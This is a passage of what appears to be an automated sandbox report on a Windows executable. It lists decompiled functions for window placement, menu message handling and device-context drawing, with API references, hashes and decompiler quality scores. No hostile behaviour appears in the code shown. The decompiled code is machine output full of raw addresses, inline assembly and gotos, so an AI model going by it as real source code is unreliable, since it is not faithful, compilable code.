                                                                                									__eflags = _t286;
                                                                                									_t287 = _t286 >> 1;
                                                                                									if(_t286 < 0) {
                                                                                										asm("adc eax, 0x0");
                                                                                									}
                                                                                									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                                                								}
                                                                                								__eflags = _t314;
                                                                                								if(_t314 < 0) {
                                                                                									_t314 = 0;
                                                                                									__eflags = 0;
                                                                                								}
                                                                                								__eflags = _t278;
                                                                                								if(_t278 < 0) {
                                                                                									_t278 = 0;
                                                                                									__eflags = 0;
                                                                                								}
                                                                                								_t328 = _t278;
                                                                                								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                								_t281 = _v8;
                                                                                								__eflags =  *((char*)(_t281 + 0x57));
                                                                                								if( *((char*)(_t281 + 0x57)) != 0) {
                                                                                									E0044FE34(_v8, _t328);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						 *((char*)(_v8 + 0x230)) = 0;
                                                                                						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                							ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                						} else {
                                                                                							if( *(_v8 + 0x22b) != 2) {
                                                                                								ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                                                								__eflags = _t220;
                                                                                								CallWindowProcA(0x406cf0, E0043BD14(_v8), 5, 0, _t220);
                                                                                								E00435900();
                                                                                							} else {
                                                                                								_t231 = E0043BD14(_v8);
                                                                                								_t232 =  *0x487bfc; // 0x2291310
                                                                                								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                                                								ShowWindow(E0043BD14(_v8), 3);
                                                                                							}
                                                                                							_t226 =  *0x487bfc; // 0x2291310
                                                                                							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_pop(_t331);
                                                                                				 *[fs:eax] = _t331;
                                                                                				_push(0x451ee8);
                                                                                				_t154 = _v8;
                                                                                				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
                                                                                				return _t154;
                                                                                			}

                                                                                0x00451bca
                                                                                0x00451bcc
                                                                                0x00451bce
                                                                                0x00451bce
                                                                                0x00451bde
                                                                                0x00451bde
                                                                                0x00451be1
                                                                                0x00451be3
                                                                                0x00451be5
                                                                                0x00451be5
                                                                                0x00451b90
                                                                                0x00451b96
                                                                                0x00451b96
                                                                                0x00451b99
                                                                                0x00451b9b
                                                                                0x00451b9d
                                                                                0x00451b9d
                                                                                0x00451ba0
                                                                                0x00451ba9
                                                                                0x00451ba9
                                                                                0x00451bac
                                                                                0x00451bae
                                                                                0x00451bb0
                                                                                0x00451bb0
                                                                                0x00451bb3
                                                                                0x00451bb3
                                                                                0x00451be8
                                                                                0x00451bea
                                                                                0x00451bec
                                                                                0x00451bec
                                                                                0x00451bec
                                                                                0x00451bee
                                                                                0x00451bf0
                                                                                0x00451bf2
                                                                                0x00451bf2
                                                                                0x00451bf2
                                                                                0x00451c02
                                                                                0x00451c0b
                                                                                0x00451c11
                                                                                0x00451c14
                                                                                0x00451c18
                                                                                0x00451c21
                                                                                0x00451c21
                                                                                0x00451c18
                                                                                0x00451b57
                                                                                0x00451cd3
                                                                                0x00451ce4
                                                                                0x00451dba
                                                                                0x00451cea
                                                                                0x00451cf4
                                                                                0x00451d47
                                                                                0x00451d5b
                                                                                0x00451d5b
                                                                                0x00451d70
                                                                                0x00451d78
                                                                                0x00451cf6
                                                                                0x00451cfb
                                                                                0x00451d06
                                                                                0x00451d15
                                                                                0x00451d25
                                                                                0x00451d25
                                                                                0x00451d86
                                                                                0x00451d95
                                                                                0x00451d95
                                                                                0x00451ce4
                                                                                0x00451a22
                                                                                0x00451ecb
                                                                                0x00451ece
                                                                                0x00451ed1
                                                                                0x00451ed6
                                                                                0x00451ed9
                                                                                0x00451ee0

                                                                                APIs
                                                                                • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00451D15
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: LoadMessageSendString
                                                                                • String ID:
                                                                                • API String ID: 1946433856-0
                                                                                • Opcode ID: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction ID: e9062d91b70e892c12dd907cc0b9357d82f2089669128c1fe80cc258a350db4e
                                                                                • Opcode Fuzzy Hash: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction Fuzzy Hash: 49F15D30A04244EFDB01DBA9C985F9E77F5AB08305F2545AAE9009B3A3D739FE44DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E0043C024(void* __eax) {
                                                                                				void* _v28;
                                                                                				struct _WINDOWPLACEMENT _v56;
                                                                                				struct tagPOINT _v64;
                                                                                				intOrPtr _v68;
                                                                                				void* _t43;
                                                                                				struct HWND__* _t45;
                                                                                				struct tagPOINT* _t47;
                                                                                
                                                                                				_t47 =  &(_v64.y);
                                                                                				_t43 = __eax;
                                                                                				if(IsIconic( *(__eax + 0x180)) == 0) {
                                                                                					GetWindowRect( *(_t43 + 0x180), _t47);
                                                                                				} else {
                                                                                					_v56.length = 0x2c;
                                                                                					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                				}
                                                                                				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                                                                					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                                                                					if(_t45 != 0) {
                                                                                						ScreenToClient(_t45, _t47);
                                                                                						ScreenToClient(_t45,  &_v64);
                                                                                					}
                                                                                				}
                                                                                				 *(_t43 + 0x40) = _t47->x;
                                                                                				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                                                                				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                                                                				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                                                                				return E00434CF4(_t43);
                                                                                			}











                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction ID: 4f0afc93a760560917b7b20bdae421720c013cc4146441cd6652f2517ecf09cd
                                                                                • Opcode Fuzzy Hash: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction Fuzzy Hash: 25118171504201AFCB11DE6DC881A8B77E8AF4D314F044A3EFD58EB386D739D9048B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00449408(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				struct HMENU__* _v12;
                                                                                				signed int _v16;
                                                                                				char _v17;
                                                                                				intOrPtr _v24;
                                                                                				int _v28;
                                                                                				struct HDC__* _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr* _v48;
                                                                                				char _v52;
                                                                                				intOrPtr _t137;
                                                                                				signed int _t138;
                                                                                				intOrPtr _t144;
                                                                                				signed int _t150;
                                                                                				signed int _t151;
                                                                                				intOrPtr* _t153;
                                                                                				void* _t158;
                                                                                				struct HMENU__* _t160;
                                                                                				intOrPtr* _t165;
                                                                                				void* _t173;
                                                                                				signed int _t177;
                                                                                				signed int _t181;
                                                                                				void* _t182;
                                                                                				void* _t214;
                                                                                				struct HDC__* _t221;
                                                                                				void* _t251;
                                                                                				signed int _t257;
                                                                                				void* _t265;
                                                                                				signed int _t271;
                                                                                				signed int _t272;
                                                                                				signed int _t274;
                                                                                				signed int _t275;
                                                                                				signed int _t277;
                                                                                				signed int _t278;
                                                                                				signed int _t280;
                                                                                				signed int _t281;
                                                                                				signed int _t283;
                                                                                				signed int _t284;
                                                                                				signed int _t286;
                                                                                				signed int _t287;
                                                                                				signed int _t290;
                                                                                				signed int _t291;
                                                                                				intOrPtr _t307;
                                                                                				intOrPtr _t311;
                                                                                				intOrPtr _t333;
                                                                                				intOrPtr _t342;
                                                                                				intOrPtr _t346;
                                                                                				intOrPtr* _t353;
                                                                                				signed int _t355;
                                                                                				intOrPtr* _t356;
                                                                                				signed int _t367;
                                                                                				signed int _t368;
                                                                                				signed int _t369;
                                                                                				signed int _t370;
                                                                                				signed int _t371;
                                                                                				signed int _t372;
                                                                                				signed int _t373;
                                                                                				intOrPtr* _t375;
                                                                                				void* _t377;
                                                                                				void* _t378;
                                                                                				intOrPtr _t379;
                                                                                				void* _t380;
                                                                                
                                                                                				_t377 = _t378;
                                                                                				_t379 = _t378 + 0xffffffd0;
                                                                                				_v52 = 0;
                                                                                				_t375 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_push(_t377);
                                                                                				_push(0x44993b);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t379;
                                                                                				_t137 =  *__edx;
                                                                                				_t380 = _t137 - 0x111;
                                                                                				if(_t380 > 0) {
                                                                                					_t138 = _t137 - 0x117;
                                                                                					__eflags = _t138;
                                                                                					if(_t138 == 0) {
                                                                                						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                						__eflags = _t271;
                                                                                						if(_t271 < 0) {
                                                                                							goto L67;
                                                                                						} else {
                                                                                							_t272 = _t271 + 1;
                                                                                							_t367 = 0;
                                                                                							__eflags = 0;
                                                                                							while(1) {
                                                                                								_t150 = E004487B4(E00413FA4(_v8, _t367),  *(_t375 + 4), __eflags);
                                                                                								__eflags = _t150;
                                                                                								if(_t150 != 0) {
                                                                                									goto L68;
                                                                                								}
                                                                                								_t367 = _t367 + 1;
                                                                                								_t272 = _t272 - 1;
                                                                                								__eflags = _t272;
                                                                                								if(_t272 != 0) {
                                                                                									continue;
                                                                                								} else {
                                                                                									goto L67;
                                                                                								}
                                                                                								goto L68;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t151 = _t138 - 8;
                                                                                						__eflags = _t151;
                                                                                						if(_t151 == 0) {
                                                                                							_v17 = 0;
                                                                                							__eflags =  *(__edx + 6) & 0x00000010;
                                                                                							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                                                								_v17 = 1;
                                                                                							}
                                                                                							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                							__eflags = _t274;
                                                                                							if(__eflags < 0) {
                                                                                								L32:
                                                                                								_t153 =  *0x486c60; // 0x487bfc
                                                                                								E00455E7C( *_t153, 0, __eflags);
                                                                                								goto L67;
                                                                                							} else {
                                                                                								_t275 = _t274 + 1;
                                                                                								_t368 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									__eflags = _v17 - 1;
                                                                                									if(_v17 != 1) {
                                                                                										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                                                                									} else {
                                                                                										_t160 =  *(_t375 + 8);
                                                                                										__eflags = _t160;
                                                                                										if(_t160 == 0) {
                                                                                											_v12 = 0xffffffff;
                                                                                										} else {
                                                                                											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                                                                										}
                                                                                									}
                                                                                									_t158 = E00413FA4(_v8, _t368);
                                                                                									_t295 = _v17;
                                                                                									_v16 = E004486F8(_t158, _v17, _v12);
                                                                                									__eflags = _v16;
                                                                                									if(__eflags != 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t368 = _t368 + 1;
                                                                                									_t275 = _t275 - 1;
                                                                                									__eflags = _t275;
                                                                                									if(__eflags != 0) {
                                                                                										continue;
                                                                                									} else {
                                                                                										goto L32;
                                                                                									}
                                                                                									goto L68;
                                                                                								}
                                                                                								E00432818( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                                                                								_t165 =  *0x486c60; // 0x487bfc
                                                                                								E00455E7C( *_t165, _v52, __eflags);
                                                                                							}
                                                                                						} else {
                                                                                							__eflags = _t151 == 1;
                                                                                							if(_t151 == 1) {
                                                                                								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                								__eflags = _t277;
                                                                                								if(_t277 < 0) {
                                                                                									goto L67;
                                                                                								} else {
                                                                                									_t278 = _t277 + 1;
                                                                                									_t369 = 0;
                                                                                									__eflags = 0;
                                                                                									while(1) {
                                                                                										_v48 = E00413FA4(_v8, _t369);
                                                                                										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                                                										__eflags = _t173 -  *(_t375 + 8);
                                                                                										if(_t173 ==  *(_t375 + 8)) {
                                                                                											break;
                                                                                										}
                                                                                										_t177 = E004486F8(_v48, 1,  *(_t375 + 8));
                                                                                										__eflags = _t177;
                                                                                										if(_t177 == 0) {
                                                                                											_t369 = _t369 + 1;
                                                                                											_t278 = _t278 - 1;
                                                                                											__eflags = _t278;
                                                                                											if(_t278 != 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L67;
                                                                                											}
                                                                                										} else {
                                                                                											break;
                                                                                										}
                                                                                										goto L68;
                                                                                									}
                                                                                									E00448FF8(_v48, _t375);
                                                                                								}
                                                                                							} else {
                                                                                								goto L67;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					goto L68;
                                                                                				} else {
                                                                                					if(_t380 == 0) {
                                                                                						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                						__eflags = _t280;
                                                                                						if(_t280 < 0) {
                                                                                							goto L67;
                                                                                						} else {
                                                                                							_t281 = _t280 + 1;
                                                                                							_t370 = 0;
                                                                                							__eflags = 0;
                                                                                							while(1) {
                                                                                								E00413FA4(_v8, _t370);
                                                                                								_t181 = E00448798( *(_t375 + 4), __eflags);
                                                                                								__eflags = _t181;
                                                                                								if(_t181 != 0) {
                                                                                									goto L68;
                                                                                								}
                                                                                								_t370 = _t370 + 1;
                                                                                								_t281 = _t281 - 1;
                                                                                								__eflags = _t281;
                                                                                								if(_t281 != 0) {
                                                                                									continue;
                                                                                								} else {
                                                                                									goto L67;
                                                                                								}
                                                                                								goto L68;
                                                                                							}
                                                                                						}
                                                                                						goto L68;
                                                                                					} else {
                                                                                						_t182 = _t137 - 0x2b;
                                                                                						if(_t182 == 0) {
                                                                                							_v40 =  *((intOrPtr*)(__edx + 8));
                                                                                							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                							__eflags = _t283;
                                                                                							if(_t283 < 0) {
                                                                                								goto L67;
                                                                                							} else {
                                                                                								_t284 = _t283 + 1;
                                                                                								_t371 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									_v16 = E004486F8(E00413FA4(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                                                                									__eflags = _v16;
                                                                                									if(_v16 != 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t371 = _t371 + 1;
                                                                                									_t284 = _t284 - 1;
                                                                                									__eflags = _t284;
                                                                                									if(_t284 != 0) {
                                                                                										continue;
                                                                                									} else {
                                                                                										goto L67;
                                                                                									}
                                                                                									goto L69;
                                                                                								}
                                                                                								_v24 = E0041F488(0, 1);
                                                                                								_push(_t377);
                                                                                								_push(0x44976e);
                                                                                								_push( *[fs:eax]);
                                                                                								 *[fs:eax] = _t379;
                                                                                								_v28 = SaveDC( *(_v40 + 0x18));
                                                                                								_push(_t377);
                                                                                								_push(0x449751);
                                                                                								_push( *[fs:eax]);
                                                                                								 *[fs:eax] = _t379;
                                                                                								E0041FE44(_v24,  *(_v40 + 0x18));
                                                                                								E0041FCC0(_v24);
                                                                                								E00449BE0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                                                								_pop(_t333);
                                                                                								 *[fs:eax] = _t333;
                                                                                								_push(0x449758);
                                                                                								__eflags = 0;
                                                                                								E0041FE44(_v24, 0);
                                                                                								return RestoreDC( *(_v40 + 0x18), _v28);
                                                                                							}
                                                                                						} else {
                                                                                							_t214 = _t182 - 1;
                                                                                							if(_t214 == 0) {
                                                                                								_v44 =  *((intOrPtr*)(__edx + 8));
                                                                                								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                								__eflags = _t286;
                                                                                								if(_t286 < 0) {
                                                                                									goto L67;
                                                                                								} else {
                                                                                									_t287 = _t286 + 1;
                                                                                									_t372 = 0;
                                                                                									__eflags = 0;
                                                                                									while(1) {
                                                                                										_v16 = E004486F8(E00413FA4(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                                                                										__eflags = _v16;
                                                                                										if(_v16 != 0) {
                                                                                											break;
                                                                                										}
                                                                                										_t372 = _t372 + 1;
                                                                                										_t287 = _t287 - 1;
                                                                                										__eflags = _t287;
                                                                                										if(_t287 != 0) {
                                                                                											continue;
                                                                                										} else {
                                                                                											goto L67;
                                                                                										}
                                                                                										goto L69;
                                                                                									}
                                                                                									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                									L00406F20();
                                                                                									_v32 = _t221;
                                                                                									 *[fs:eax] = _t379;
                                                                                									_v24 = E0041F488(0, 1);
                                                                                									 *[fs:eax] = _t379;
                                                                                									_v28 = SaveDC(_v32);
                                                                                									 *[fs:eax] = _t379;
                                                                                									E0041FE44(_v24, _v32);
                                                                                									E0041FCC0(_v24);
                                                                                									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44986f, _t377,  *[fs:eax], 0x44988c, _t377,  *[fs:eax], 0x4498b1, _t377, _t221);
                                                                                									_pop(_t342);
                                                                                									 *[fs:eax] = _t342;
                                                                                									_push(0x449876);
                                                                                									__eflags = 0;
                                                                                									E0041FE44(_v24, 0);
                                                                                									return RestoreDC(_v32, _v28);
                                                                                								}
                                                                                							} else {
                                                                                								if(_t214 == 0x27) {
                                                                                									_v36 =  *((intOrPtr*)(__edx + 8));
                                                                                									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                									__eflags = _t290;
                                                                                									if(_t290 < 0) {
                                                                                										goto L67;
                                                                                									} else {
                                                                                										_t291 = _t290 + 1;
                                                                                										_t373 = 0;
                                                                                										__eflags = 0;
                                                                                										while(1) {
                                                                                											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413FA4(_v8, _t373))) + 0x34))();
                                                                                											_t346 = _v36;
                                                                                											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                                                                											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                                                                												_v16 = E004486F8(E00413FA4(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                											} else {
                                                                                												_v16 =  *((intOrPtr*)(E00413FA4(_v8, _t373) + 0x34));
                                                                                											}
                                                                                											__eflags = _v16;
                                                                                											if(_v16 != 0) {
                                                                                												break;
                                                                                											}
                                                                                											_t373 = _t373 + 1;
                                                                                											_t291 = _t291 - 1;
                                                                                											__eflags = _t291;
                                                                                											if(_t291 != 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L67;
                                                                                											}
                                                                                											goto L68;
                                                                                										}
                                                                                										_t257 = E00448728(E00413FA4(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                                                                										__eflags = _t257;
                                                                                										if(_t257 == 0) {
                                                                                											_t265 = E00413FA4(_v8, _t373);
                                                                                											__eflags = 0;
                                                                                											_t257 = E00448728(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                										}
                                                                                										_t353 =  *0x486dac; // 0x487c00
                                                                                										_t355 =  *( *_t353 + 0x6c);
                                                                                										__eflags = _t355;
                                                                                										if(_t355 != 0) {
                                                                                											__eflags = _t257;
                                                                                											if(_t257 == 0) {
                                                                                												_t257 =  *(_t355 + 0x158);
                                                                                											}
                                                                                											_t307 =  *0x486dac; // 0x487c00
                                                                                											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                                                                											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                                                                												_t356 =  *0x486c60; // 0x487bfc
                                                                                												E00455B18( *_t356, _t291, _t307, _t257, _t373, _t375);
                                                                                											} else {
                                                                                												E00455B80();
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									L67:
                                                                                									_push( *(_t375 + 8));
                                                                                									_push( *(_t375 + 4));
                                                                                									_push( *_t375);
                                                                                									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                									_push(_t144);
                                                                                									L00406CF8();
                                                                                									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                                                                								}
                                                                                								L68:
                                                                                								_pop(_t311);
                                                                                								 *[fs:eax] = _t311;
                                                                                								_push(0x449942);
                                                                                								return E00404320( &_v52);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L69:
                                                                                			}


                                                                                APIs
                                                                                • SaveDC.GDI32(?), ref: 004496D7
                                                                                • RestoreDC.GDI32(?,?), ref: 0044974B
                                                                                • 72E7B080.USER32(?,00000000,0044993B), ref: 004497C5
                                                                                • SaveDC.GDI32(?), ref: 004497FC
                                                                                • RestoreDC.GDI32(?,?), ref: 00449869
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044993B), ref: 0044991D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: RestoreSave$B080NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4024241980-0
                                                                                • Opcode ID: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction ID: a45c3f59b09cd28d2ba5bdec491db0630d48655138bc4fa014f9cd7e6cd3b5ed
                                                                                • Opcode Fuzzy Hash: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction Fuzzy Hash: BFE16E74A046099FEB10DF6AC48199FF3F5FF89304B2185AAE815A7325C738ED42DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0044EEEC(intOrPtr __eax, intOrPtr* __edx) {
                                                                                				intOrPtr _v8;
                                                                                				int _v12;
                                                                                				intOrPtr _v16;
                                                                                				struct HDC__* _v20;
                                                                                				intOrPtr* _v24;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t92;
                                                                                				struct HWND__* _t93;
                                                                                				struct HWND__* _t96;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t119;
                                                                                				struct HWND__* _t125;
                                                                                				struct HWND__* _t128;
                                                                                				intOrPtr _t132;
                                                                                				intOrPtr _t133;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t136;
                                                                                				struct HWND__* _t138;
                                                                                				struct HWND__* _t141;
                                                                                				void* _t145;
                                                                                				intOrPtr _t148;
                                                                                				intOrPtr _t179;
                                                                                				struct HDC__* _t184;
                                                                                				intOrPtr* _t207;
                                                                                				intOrPtr _t232;
                                                                                				intOrPtr _t238;
                                                                                				intOrPtr _t245;
                                                                                				struct HWND__* _t249;
                                                                                				struct HWND__* _t250;
                                                                                				struct HWND__* _t255;
                                                                                				intOrPtr* _t256;
                                                                                				void* _t258;
                                                                                				void* _t260;
                                                                                				intOrPtr _t261;
                                                                                				void* _t263;
                                                                                				void* _t267;
                                                                                
                                                                                				_t258 = _t260;
                                                                                				_t261 = _t260 + 0xffffffec;
                                                                                				_t207 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t92 =  *__edx;
                                                                                				_t263 = _t92 - 0x46;
                                                                                				if(_t263 > 0) {
                                                                                					_t93 = _t92 - 0xb01a;
                                                                                					__eflags = _t93;
                                                                                					if(_t93 == 0) {
                                                                                						__eflags =  *(_v8 + 0xa0);
                                                                                						if(__eflags != 0) {
                                                                                							E004037B0(_v8, __eflags);
                                                                                						}
                                                                                					} else {
                                                                                						__eflags = _t93 == 1;
                                                                                						if(_t93 == 1) {
                                                                                							__eflags =  *(_v8 + 0xa0);
                                                                                							if(__eflags != 0) {
                                                                                								E004037B0(_v8, __eflags);
                                                                                							}
                                                                                						} else {
                                                                                							goto L41;
                                                                                						}
                                                                                					}
                                                                                					goto L43;
                                                                                				} else {
                                                                                					if(_t263 == 0) {
                                                                                						_t116 = _v8;
                                                                                						_t232 =  *0x44f31c; // 0x1
                                                                                						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x44f318);
                                                                                						if(_t232 == ( *(_t116 + 0x1c) &  *0x44f318)) {
                                                                                							_t119 = _v8;
                                                                                							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
                                                                                							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
                                                                                								_t132 = _v8;
                                                                                								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
                                                                                								if( *((char*)(_t132 + 0x22b)) != 2) {
                                                                                									_t133 =  *((intOrPtr*)(__edx + 8));
                                                                                									_t26 = _t133 + 0x18;
                                                                                									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
                                                                                									__eflags =  *_t26;
                                                                                								}
                                                                                							}
                                                                                							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                                                                							__eflags = _t125;
                                                                                							if(_t125 == 0) {
                                                                                								L30:
                                                                                								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                                                                								__eflags = _t128;
                                                                                								if(_t128 == 0) {
                                                                                									L32:
                                                                                									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
                                                                                								} else {
                                                                                									__eflags = _t128 == 3;
                                                                                									if(_t128 == 3) {
                                                                                										goto L32;
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								__eflags = _t125 == 2;
                                                                                								if(_t125 == 2) {
                                                                                									goto L30;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L43;
                                                                                					} else {
                                                                                						_t96 = _t92 + 0xfffffffa - 3;
                                                                                						if(_t96 < 0) {
                                                                                							__eflags =  *0x46bb18;
                                                                                							if( *0x46bb18 != 0) {
                                                                                								__eflags =  *__edx - 7;
                                                                                								if( *__edx != 7) {
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t135 = _v8;
                                                                                									__eflags =  *(_t135 + 0x1c) & 0x00000010;
                                                                                									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
                                                                                										goto L43;
                                                                                									} else {
                                                                                										_t255 = 0;
                                                                                										_t136 = _v8;
                                                                                										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
                                                                                										if( *((char*)(_t136 + 0x22f)) != 2) {
                                                                                											_t138 =  *(_v8 + 0x220);
                                                                                											__eflags = _t138;
                                                                                											if(_t138 != 0) {
                                                                                												__eflags = _t138 - _v8;
                                                                                												if(_t138 != _v8) {
                                                                                													_t255 = E0043BD14(_t138);
                                                                                												}
                                                                                											}
                                                                                										} else {
